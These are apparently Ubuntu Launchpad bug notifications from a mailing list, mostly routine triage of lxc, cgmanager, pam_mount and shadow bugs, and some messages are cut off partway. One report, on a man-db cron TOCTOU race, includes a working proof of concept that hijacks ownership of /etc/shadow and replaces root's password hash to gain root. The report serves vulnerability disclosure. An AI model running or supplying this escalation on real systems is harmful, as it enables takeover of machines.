  - 0047-cgroups-tweak-cgroup-initialization.patch
  - 0048-log-remove-pointless-inline.patch
  - 0049-log-add-lxc_log_get_fd.patch
  - 0050-seccomp-use-lxc_log_get_fd.patch
  - 0051-log-rework-lxc_log_get_level.patch
  - 0052-seccomp-use-lxc_log_get_level.patch
  - 0053-cgroups-use-bpf-log-when-logging-at-trace-level.patch
  - 0054-log-add-lxc_log_trace-helper.patch
  - 0055-cgroups-use-PTR_TO_U64.patch
  - 0056-cgroups-align-methods.patch
  - 0057-utils-use-SYSTRACE-when-logging-stdio-permission-fix.patch
  - 0058-attach-log-failues-to-dup2-with-SYSDEBUG.patch
  - 0059-attach-fix-logging-for-stdfd-replacement.patch
  - 0060-attach-fix-error-checking-for-dup2.patch
  - 0061-cgroups-initialize-variable.patch
  - 0062-commands_utils-don-t-leak-memory.patch
  - 0063-conf-use-lxc_log_trace.patch
  - 0064-confile_utils-use-lxc_log_trace.patch
  - 0065-rexec-check-lseek-return-value.patch

* Cherry-pick upstream bugfix:
  - cgroups: fix armhf builds

* Cherry-pick upstream bugfix:
  - cgfsng: fix cgroup attach cgroup creation

* New upstream bugfix release (4.0.4):
  - Support for new Linux clone flags (clone into cgroup)
  - Support for new Linux VFS system calls
  - Internal symbols are now properly hidden from external consumers
* New upstream bugfix release (4.0.3):
  - Improvement to cgroupv1/cgroupv2 handling
 

[Touch-packages] [Bug 1923232] [NEW] SRU of LXC 4.0.6 to focal (upstream bugfix release)

[Serge Hallyn]

 included in this upstream release.

[Test case]
lxc has autopkgtests which will assert that the binaries built in -proposed are 
functional.

** Affects: lxc (Ubuntu)
 Importance: Undecided
 Status: New

** Affects: lxc (Ubuntu Bionic)
 Importance: High
 Assignee: Serge Hallyn (serge-hallyn)
 Status: New

** Affects: lxc (Ubuntu Focal)
 Importance: High
 Assignee: Serge Hallyn (serge-hallyn)
 Status: New

** Also affects: lxc (Ubuntu Focal)
   Importance: Undecided
   Status: New

** Also affects: lxc (Ubuntu Bionic)
   Importance: Undecided
   Status: New

** Changed in: lxc (Ubuntu Focal)
 Assignee: (unassigned) => Serge Hallyn (serge-hallyn)

** Changed in: lxc (Ubuntu Bionic)
 Assignee: (unassigned) => Serge Hallyn (serge-hallyn)

** Changed in: lxc (Ubuntu Bionic)
   Importance: Undecided => High

** Changed in: lxc (Ubuntu Focal)
   Importance: Undecided => High

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1923232

Title:
  SRU of LXC 4.0.6 to focal (upstream bugfix release)

Status in lxc package in Ubuntu:
  New
Status in lxc source package in Bionic:
  New
Status in lxc source package in Focal:
  New

Bug description:
  LXC released 4.0.6 as a bugfix release with the following changelog:

  - Improve handling for compatibility architectures for seccomp
  - Harden seccomp notifier implementation
  - Rework parsing of /proc//mountinfo to handle kernel regression
  - Improve network device restoration
  - Significantly cleanup and harden config file parsing
  - Support new capabilities CAP_PERFORM, CAP_BPF, and 
CAP_CHECKPOINT_RESTORE
  - Harden containers started without CAP_NET_ADMIN
* New upstream bugfix release (4.0.5):
  - Support allocating PTS devices from within the container
  - Harden more path/mount handling logics
  - Rework LSM logic to limit initializer use
* Cherry-pick upstream fixes:
  - 0002-commands-fix-check-for-seccomp-notify-support.patch
  - 0003-configure-skip-libseccomp-tests-if-it-is-disabled.patch
  - 0004-conf-fix-containers-retaining-CAP_NET_ADMIN.patch
  - 0005-cgroups-fix-cgroup-mounting.patch
  - 0006-lsm-remove-obsolute-comment-about-constructor.patch
  - 0007-lxc_attach-include-rexec-conditionally.patch
  - 0008-tree-wide-fix-some-header-inclusions.patch
  - 0009-initutils-fix-missing-includes.patch
  - 0010-configure-support-static-binaries.patch
  - 0011-autotools-enable-static-builds-for-tools.patch
  - 0012-autotools-enable-static-builds-for-commands.patch
  - 0013-tree-wide-fix-compilation-with-Wstrict-prototypes-Wo.patch
  - 0014-config-update-ax_pthread.m4.patch
  - 0015-configure-add-AC_SYS_LARGEFILE-checking.patch
  - 0016-autotools-update-build.patch
  - 0017-file_utils-introduce-read_file_at.patch
  - 0018-string_utils-add-must_make_path_relative.patch
  - 0019-cgroups-coding-style-fixes.patch
  - 0020-cgroups-rework-cg_unified_init.patch
  - 0021-cgroups-detect-and-record-cgroup2-freezer-support.patch
  - 0022-criu-handle-cgroup2-freezer.patch
  - 0023-mkdir-p-proc-sys-on-container-startup.patch
  - 0024-conf-fix-coding-style.patch
  - 0025-conf-coding-style-fixes.patch
  - 0026-conf-move-proc-and-sys-mountpoint-creation-int-lxc_m.patch
  - 0027-attach-invert-child-parent-handling.patch
  - 0028-attach-use-__do_free-cleanup-macro-for-cwd.patch
  - 0029-attach-tweak-logging.patch
  - 0030-attach-use-__do_close-for-labelfd.patch
  - 0031-attach-coding-style-fixes.patch
  - 0032-attach-use-free_disarm.patch
  - 0033-attach-s-attach_child_main-do_attach-g.patch
  - 0034-attach-mark-do_attach-as-__noreturn.patch
  - 0035-attach-make-do_attach-void.patch
  - 0036-attach-use-close_prot_errno_disarm.patch
  - 0037-attach-add-some-DEBUG-logging-to-stdfd-dpulication.patch
  - 0038-cgroups-fix-cgroup-mounting.patch
  - 0039-utils-fix-mount_at.patch
  - 0040-configure-fix-static-builds-with-clang-12-and-LTO.patch
  - 0041-cgroups-bpf-fixes.patch
  - 0042-croups-improve-__do_bpf_program_free.patch
  - 0043-cgroups-coding-style-fixes.patch
  - 0044-cgroups-don-t-initiliaze-NULL-log.patch
  - 0045-cgroups-ensure-all-memory-is-zeroed.patch
  - 0046-cgroups-use-zalloc.patch
  - 0047-cgroups-tweak-cgroup-initialization.patch
  - 0048-log-remove-pointless-inline.patch
  - 0049-log-add-lxc_log_get_fd.patch
  - 0050-seccomp-use-lxc_log_get_fd.patch
  - 0051-log-rework-lxc_log_get_level.patch
  - 0052-seccomp-use-lxc_log_get_level.patch
  - 0053-cgroups-use-bpf-log-when-logging-at-trace-level.patch
  - 0054-log-add-lxc_log_trace-helper.patch
  - 0055-cgroups-use-PTR_TO_U64.patch
  - 0056-cgroups-align-methods.patch
  - 00

[Touch-packages] [Bug 1532314] Re: Buffer overflow in cgmanager

[Serge Hallyn]

I'm not sure 'fix released' is correct.  Was a patch posted to fix it?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1532314

Title:
  Buffer overflow in cgmanager

Status in cgmanager package in Ubuntu:
  Fix Released
Status in libnih package in Ubuntu:
  Confirmed
Status in lxc package in Ubuntu:
  Confirmed

Bug description:
  Host: Ubuntu 15.10
  lxc: 1.1.5-0ubuntu0.15.10.3
  cgmanager: 0.39-2ubuntu2
  Container: Ubuntu 15.10

  Got the following trace in syslog. Please let me know what other
  information will be useful for troubleshooting.

  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: *** buffer overflow 
detected ***: /sbin/cgmanager terminated
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: === Backtrace: 
=
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 
/lib/x86_64-linux-gnu/libc.so.6(+0x78c4e)[0x7f1929550c4e]
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7f19295f0e8c]
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 
/lib/x86_64-linux-gnu/libc.so.6(+0x116e80)[0x7f19295eee80]
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 
/lib/x86_64-linux-gnu/libc.so.6(+0x118dd7)[0x7f19295f0dd7]
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 
/lib/x86_64-linux-gnu/libnih.so.1(nih_io_handle_fds+0xad)[0x7f1929d01b3d]
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 
/lib/x86_64-linux-gnu/libnih.so.1(nih_main_loop+0x13f)[0x7f1929d05faf]
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 
/sbin/cgmanager(+0x5145)[0x562d8fc75145]
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f19294f8a40]
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 
/sbin/cgmanager(+0x53d9)[0x562d8fc753d9]
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: === Memory map: 

  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 562d8fc7-562d8fc92000 
r-xp  ca:01 12884  /sbin/cgmanager
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 562d8fe92000-562d8fe94000 
r--p 00022000 ca:01 12884  /sbin/cgmanager
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 562d8fe94000-562d8fe95000 
rw-p 00024000 ca:01 12884  /sbin/cgmanager
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 562d915f8000-562d9203 
rw-p  00:00 0  [heap]
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927d44000-7f1927d5a000 
r-xp  ca:01 395872 
/lib/x86_64-linux-gnu/libgcc_s.so.1
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927d5a000-7f1927f59000 
---p 00016000 ca:01 395872 
/lib/x86_64-linux-gnu/libgcc_s.so.1
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927f59000-7f1927f5a000 
r--p 00015000 ca:01 395872 
/lib/x86_64-linux-gnu/libgcc_s.so.1
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927f5a000-7f1927f5b000 
rw-p 00016000 ca:01 395872 
/lib/x86_64-linux-gnu/libgcc_s.so.1
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927f5b000-7f1927f67000 
r-xp  ca:01 403839 
/lib/x86_64-linux-gnu/libnss_files-2.21.so
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927f67000-7f1928166000 
---p c000 ca:01 403839 
/lib/x86_64-linux-gnu/libnss_files-2.21.so
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928166000-7f1928167000 
r--p b000 ca:01 403839 
/lib/x86_64-linux-gnu/libnss_files-2.21.so
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928167000-7f1928168000 
rw-p c000 ca:01 403839 
/lib/x86_64-linux-gnu/libnss_files-2.21.so
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928168000-7f1928173000 
r-xp  ca:01 403823 
/lib/x86_64-linux-gnu/libnss_nis-2.21.so
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928173000-7f1928372000 
---p b000 ca:01 403823 
/lib/x86_64-linux-gnu/libnss_nis-2.21.so
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928372000-7f1928373000 
r--p a000 ca:01 403823 
/lib/x86_64-linux-gnu/libnss_nis-2.21.so
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928373000-7f1928374000 
rw-p b000 ca:01 403823 
/lib/x86_64-linux-gnu/libnss_nis-2.21.so
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928374000-7f192838b000 
r-xp  ca:01 403845 
/lib/x86_64-linux-gnu/libnsl-2.21.so
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f192838b000-7f192858a000 
---p 00017000 ca:01 403845 
/lib/x86_64-linux-gnu/libnsl-2.21.so
  Jan  8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f192858a000-7f192858b000 
r--p 00016000 ca:01 

[Touch-packages] [Bug 73024] Re: unknown item 'FAIL_DELAY'

[Serge Hallyn]

Marking invalid as the comment in login.defs says these are handled by
pam.

** Changed in: shadow (Ubuntu)
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/73024

Title:
  unknown item 'FAIL_DELAY'

Status in shadow package in Ubuntu:
  Invalid

Bug description:
  Some package doesn't understand FAIL_DELAY in /etc/login.defs. On
  logging in the terminal session (CTRL+ALT+F*) a message "configuration
  error - unknown item 'FAIL_DELAY' (notify administrator)" appears. The
  same happens if I use su. If I comment the appropriate line in
  /etc/login.defs, the message doesn't appear.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/73024/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 117736] Re: pam_mount unable to unmount needs root priv

[Serge Hallyn]

Marking fix released for shadow based on the openssh and debian status.

** Changed in: shadow (Ubuntu)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/117736

Title:
  pam_mount unable to unmount needs root priv

Status in PAM:
  In Progress
Status in libpam-mount package in Ubuntu:
  Confirmed
Status in openssh package in Ubuntu:
  Fix Released
Status in shadow package in Ubuntu:
  Fix Released
Status in Debian:
  Fix Released

Bug description:
  Binary package hint: libpam-mount

  From pam_mount developer Jan Engelhard sourceforge mailing list:
  "pam_mount *needs* the root privileges, but Ubuntu's PAM configuration
  decided to throw them away after the login sequence completed."

  From Ubuntu Feisty Fawn user Kalisto:

  "When using loopback encrypted file systems this is a security issue, user 
logs out but the device is not umounted!!
  Without pam_mount debug option set this is not immediately apparent to the 
user!

  I have followed the instructions on: http://felipe-
  alfaro.org/blog/2006/08/19/encrypted-home-on-ubuntu-using-cryptoloop/

  To create a loopback encrypted home directory with pam_mount.
  The dir mounts ok and seemes to work however on logout I get " error setting 
uid to 0"
  lsof -n | grep /home/crypto comes up empty.

  I have included a pam_mount debug output for the login and logout process:
  For easier viewing: http://rafb.net/p/HLVzwm40.nln.html

  user@trinity:su crypto
  pam_mount(pam_mount.c:461) pam_sm_open_session: real uid/gid=0:1001, 
effective uid/gid=0:1001
  pam_mount(readconfig.c:418) checking sanity of volume record 
(/home/crypto.img)
  pam_mount(pam_mount.c:476) about to perform mount operations

  pam_mount(mount.c:368) information for mount:
  pam_mount(mount.c:369) --
  pam_mount(mount.c:370) (defined by globalconf)
  pam_mount(mount.c:373) user:  crypto
  pam_mount(mount.c:374) server:

  pam_mount(mount.c:375) volume:/home/crypto.img
  pam_mount(mount.c:376) mountpoint:/home/crypto
  pam_mount(mount.c:377) options:   
loop,user,exec,encryption=aes,keybits=128
  pam_mount(mount.c:378) fs_key_cipher: aes-128-ecb

  pam_mount(mount.c:379) fs_key_path:   /home/crypto.key
  pam_mount(mount.c:380) use_fstab:   0
  pam_mount(mount.c:381) --
  pam_mount(mount.c:177) realpath of volume "/home/crypto" is "/home/crypto"

  pam_mount(mount.c:182) checking to see if /home/crypto.img is already mounted 
at /home/crypto
  pam_mount(mount.c:755) /home/crypto.img already seems to be mounted at 
/home/crypto, skipping
  pam_mount(pam_mount.c:123) clean system authtok (0)

  pam_mount(misc.c:264) command: /usr/sbin/pmvarrun [-u] [crypto] [-o] [1] 
  pam_mount(misc.c:341) set_myuid(pre): real uid/gid=0:1001, effective 
uid/gid=0:1001
  pam_mount(misc.c:376) set_myuid(post): real uid/gid=0:1001, effective 
uid/gid=0:1001

  pam_mount(pam_mount.c:360) pmvarrun says login count is 3
  pam_mount(pam_mount.c:493) done opening session
  pam_mount(pam_mount.c:106) Clean global config (0)
   
  ===

  crypto@trinity:exit
   
  exit
  pam_mount(pam_mount.c:535) received order to close things
  pam_mount(pam_mount.c:536) real and effective user ID are 1001 and 1001.
  pam_mount(misc.c:264) command: /usr/sbin/pmvarrun [-u] [crypto] [-o] [-1] 

  pam_mount(misc.c:341) set_myuid(pre): real uid/gid=1001:1001, effective 
uid/gid=1001:1001
  pam_mount(misc.c:346) error setting uid to 0
  pam_mount(pam_mount.c:360) pmvarrun says login count is 2
  pam_mount(pam_mount.c:564) crypto seems to have other remaining open sessions

  pam_mount(pam_mount.c:569) pam_mount execution complete
  pam_mount(pam_mount.c:535) received order to close things
  pam_mount(pam_mount.c:536) real and effective user ID are 1001 and 1001.
  pam_mount(misc.c:264) command: /usr/sbin/pmvarrun [-u] [crypto] [-o] [-1] 

  pam_mount(misc.c:341) set_myuid(pre): real uid/gid=1001:1001, effective 
uid/gid=1001:1001
  pam_mount(misc.c:346) error setting uid to 0
  pam_mount(pam_mount.c:360) pmvarrun says login count is 1
  pam_mount(pam_mount.c:564) crypto seems to have other remaining open sessions

  pam_mount(pam_mount.c:569) pam_mount execution complete
  pam_mount(pam_mount.c:106) Clean global config (0)
   
  ===
  Entry in /etc/security/pam_mount.conf

   
  volume crypto auto - /home/crypto.img /home/crypto 
loop,user,exec,encryption=aes,keybits=128 aes-128-ecb /home/crypto.key

  /Kalisto"

To manage notifications about this bug go to:
https://bugs.launchpad.net/pam/+bug/117736/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : 

[Touch-packages] [Bug 621528] Re: package nfs-common 1:1.2.0-4ubuntu4 failed to install/upgrade: el subproceso script post-installation instalado devolvió el código de salida de error 1

[Serge Hallyn]

** Package changed: shadow (Ubuntu) => nfs-utils (Ubuntu)

** Changed in: nfs-utils (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/621528

Title:
  package nfs-common 1:1.2.0-4ubuntu4 failed to install/upgrade: el
  subproceso script post-installation instalado devolvió el código de
  salida de error 1

Status in nfs-utils package in Ubuntu:
  Invalid

Bug description:
  Estaba actualizando el juego WARZONE 2100 y me aparece ese error cada
  vez que descargo del Synaptic

  ProblemType: Package
  DistroRelease: Ubuntu 10.04
  Package: nfs-common 1:1.2.0-4ubuntu4
  ProcVersionSignature: Ubuntu 2.6.32-23.37-generic 2.6.32.15+drm33.5
  Uname: Linux 2.6.32-23-generic i686
  NonfreeKernelModules: wl
  Architecture: i386
  Date: Fri Aug 20 21:38:12 2010
  ErrorMessage: el subproceso script post-installation instalado devolvió el 
código de salida de error 1
  InstallationMedia: Ubuntu 10.04 LTS "Lucid Lynx" - Release i386 (20100429)
  SourcePackage: nfs-utils
  Title: package nfs-common 1:1.2.0-4ubuntu4 failed to install/upgrade: el 
subproceso script post-installation instalado devolvió el código de salida de 
error 1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/nfs-utils/+bug/621528/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1669156] Re: Fails writing with Caps Lock

[Serge Hallyn]

This is not a shadow bug.  It's either a bug in the graphical login
manager, or X, or a terminal driver.  Please re-open if it is still
relevant.

** Package changed: shadow (Ubuntu) => lightdm (Ubuntu)

** Changed in: lightdm (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1669156

Title:
  Fails writing with Caps Lock

Status in lightdm package in Ubuntu:
  Incomplete

Bug description:
  On Ubuntu 16.04:

  When clicking on the following 3 keyboard keys simultaneously: 
  Left-CTRL + Left-ALT + F1
  Then you get to a textual terminal (CLI) where you can type commands.
  But there is a problem when typing English letters with Caps Lock turned on:
  Instead of English capital letters - you see squares, 
  so actually you can't login to your user that way
  if the username/password has Capital letters.

  The only method which allows you to write capital English letters
  is to simultaneously click Left-Shift + 'a letter'. 
  That is the only method that works well.

  Note that the Caps Lock key works well with the graphical terminal (pseudo / 
pts)
  that appears on Ubuntu when hitting simultaneously:
  Left-CTRL + Left-ALT + T

  ---

  I assumed the bug report is relevant to "shadow" package because that
  the "/bin/login" binary comes from that package.
  Package version of 'shadow' is: 1:4.2-3.1ubuntu5

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1669156/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1608026] Re: package login 1:4.1.5.1-1ubuntu9 failed to install/upgrade: package login is not ready for configuration cannot configure (current status `half-installed')

[Serge Hallyn]

** Changed in: shadow (Ubuntu)
   Status: New => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1608026

Title:
  package login 1:4.1.5.1-1ubuntu9 failed to install/upgrade: package
  login is not ready for configuration  cannot configure (current status
  `half-installed')

Status in shadow package in Ubuntu:
  Fix Released

Bug description:
  Trying install Ubuntu 14.04 LTS at IBM ThinkPad T41. 
  Using "forcepae" succeeds.
  Machine is very slow... Compiz very active: 30 to 50 % CPU

  ProblemType: Package
  DistroRelease: Ubuntu 14.04
  Package: login 1:4.1.5.1-1ubuntu9
  ProcVersionSignature: Ubuntu 3.16.0-30.40~14.04.1-generic 3.16.7-ckt3
  Uname: Linux 3.16.0-30-generic i686
  ApportVersion: 2.14.1-0ubuntu3.7
  Architecture: i386
  Date: Sat Jul 30 10:38:30 2016
  DpkgTerminalLog:
   dpkg: error processing package login (--configure):
package login is not ready for configuration
cannot configure (current status `half-installed')
  DuplicateSignature: package:login:1:4.1.5.1-1ubuntu9:package login is not 
ready for configuration  cannot configure (current status `half-installed')
  ErrorMessage: package login is not ready for configuration  cannot configure 
(current status `half-installed')
  InstallationDate: Installed on 2016-07-30 (0 days ago)
  InstallationMedia: Ubuntu 14.04.2 LTS "Trusty Tahr" - Release i386 
(20150218.1)
  SourcePackage: shadow
  Title: package login 1:4.1.5.1-1ubuntu9 failed to install/upgrade: package 
login is not ready for configuration  cannot configure (current status 
`half-installed')
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1608026/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1595080] Re: /etc/shadow has wrong ownership

[Serge Hallyn]

On my 18.04 laptop it is group shadow and group readable.

If anyone can still reproduce this, please re-open this bug.  It is
likely an intaller bug.

** Changed in: shadow (Ubuntu)
   Status: New => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1595080

Title:
  /etc/shadow has wrong ownership

Status in shadow package in Ubuntu:
  Fix Released

Bug description:
  I think this is identical to bug 50587 but the latter is rather old, dating 
from 2006.
  On the latest ubuntu 16.04 LTS the ownership of /etc/shadow is still not 
fixed.
  To my understanding it should be 
  -r--r- 1 root shadow  to conform to legacy programs as well
  and not
  -rw--- 1 root root   as it is on a new install.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1595080/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1770233] Re: Login package changes MIN_UID in /etc/login.defs -> AccountsService/GDM then ignores existing user (UID 501) -> starts gnome-inital-setup to create user

[Serge Hallyn]

** Package changed: shadow (Ubuntu) => gnome-initial-setup (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1770233

Title:
  Login package changes MIN_UID in /etc/login.defs ->
  AccountsService/GDM then ignores existing user (UID 501) -> starts
  gnome-inital-setup to create user

Status in gnome-initial-setup package in Ubuntu:
  New

Bug description:
  On May 8. 2018 I was prompted to upgrade from 17.10 to 18.04.

  The upgrade went smooth except that the installer asked me if it could
  make changes to /etc/login.defs. I thought it was supposed to not ask
  questions (and stall the upgrade if I was away from the computer), but
  I pressed yes and it continued. I pressed yes since I had not
  personally modified this file as far as I can remember and was not
  particularly attached to its contents.

  After reboot gnome-initial-setup wants me to create a new user. There
  is no (obvious) way to login with my old user, but Ctrl+Alt+F2 luckily
  worked---I could log in and all my files where still there. I tried
  changing UID_MIN in /etc/login.defs back to 500 from 1000 (I believe
  this was the change I was prompted about), but I still could not login
  graphically, so the /etc/login.defs change may have been unconnected
  to the bug.

  I was able to figure out that the offending program was called gnome-
  initial-setup and an "apt purge gnome-initial-setup" later I could log
  in as normal. I do not believe an average user could have figured this
  out (how many even know about the virtual terminals Ctrl+Alt+FX?).

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnome-initial-setup/+bug/1770233/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 914499] Re: 'su --help' exits with error code 2

[Serge Hallyn]

** Changed in: shadow (Ubuntu)
   Status: New => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/914499

Title:
  'su --help' exits with error code 2

Status in shadow package in Ubuntu:
  Fix Released

Bug description:
  Version: 1:4.1.4.2-1ubuntu3.2

  Linux applications that have a "help" or "usage" option almost
  universally print the requested help to stdout and return with an exit
  code of zero.  There was, after all, no error since the user
  explicitly requested this output.

  'su --help', for no apparent reason, prints its help to stderr and
  exits with code 2.  As long as there is a non-zero exit code, output
  to stderr is correct, but it I am convinced the exit code should be
  zero and the output should go to stdout.

  Oddly, although the 'man su' pages do not list -h or --help among the
  available options, 'su --help' does (it also does not complain of an
  invalid option).

  I'm reporting this here because the su maintainers are listed as
  "Ubuntu Developers ".

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/914499/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1388272] Re: Login screen shows different background picture such as set for desktop background

[Serge Hallyn]

This clearly is not related to shadow, but which package it affects
would depend on which login manager was being used.  In the unlikely
event this is still an issue, please re-open this bug and let us know
which you are using.

** Changed in: shadow (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1388272

Title:
  Login screen shows different background picture such as set for
  desktop background

Status in shadow package in Ubuntu:
  Incomplete

Bug description:
  Ubuntu 14.10 shows a different background for login screen such as set
  for desktop background. In 14.04 it was working fine. I don't know
  what's the original behavior of 14.10, it may have change since 14.04

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1388272/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

[Serge Hallyn]

@cjwatson - is it safe to assume the fix was entirely in man-db?  Or was
shadow supposed to do something here as well?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Fix Released
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
